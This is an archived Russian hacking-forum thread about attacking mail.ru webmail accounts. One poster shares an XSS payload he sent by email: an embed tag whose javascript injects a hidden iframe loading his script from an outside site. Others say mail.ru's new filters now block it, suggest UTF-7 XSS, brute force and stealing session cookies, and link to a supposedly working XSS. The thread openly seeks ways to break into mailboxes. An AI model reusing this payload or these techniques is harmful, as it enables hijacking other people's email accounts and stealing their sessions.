PDA

Просмотр полной версии : проблема с mail.ru


unhappy
19.06.2005, 17:46
сделал все как написано в вашей статье, себе на сайт залил файл с формой, а на нужный мыльник отправил <embed src="javascript:status=location;document.getElementById('xxx'). innerHTML='<iframe src=http://yoursite.ru/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>
мыльник который хочу сломать - мой =) т.е. я знаю от него пароль, просто на своём эксперементирую =) когда я открыл тот ящик куда пришел выше указанный код, я заметил, что, по идее хтмл кода-то не должно быть видно, а он походу отфильтровывается теперь...т.е. код отосланный мной, его видно в письме, и он, естессно, не пашет...
зы: вначале письмо в хтмл формате (не аттачем)...
вот...че такое?

Майор
19.06.2005, 17:54
там поставили новые фильтры
теперь c наличием xss - там проблема

DRON-ANARCHY
19.06.2005, 18:18
Мдя...Mail.ru обновился....

unhappy
19.06.2005, 18:32
*** и чего...теперь там дыр нету? как еще можно ломануть? =)
зы: социнженерью не предлагать...

from moderator : не матерись

Майор
19.06.2005, 19:11
Почитайте "Использование UTF-7 в атаках класса XSS"

GreenBear
19.06.2005, 19:12
раз не СИ, так брут -)

JazzzSummerMan
19.06.2005, 19:19
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread.php?p=46400#post46400&conly=

Майор
19.06.2005, 19:31
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread.php?p=46400#post46400&conly=
уже не пашет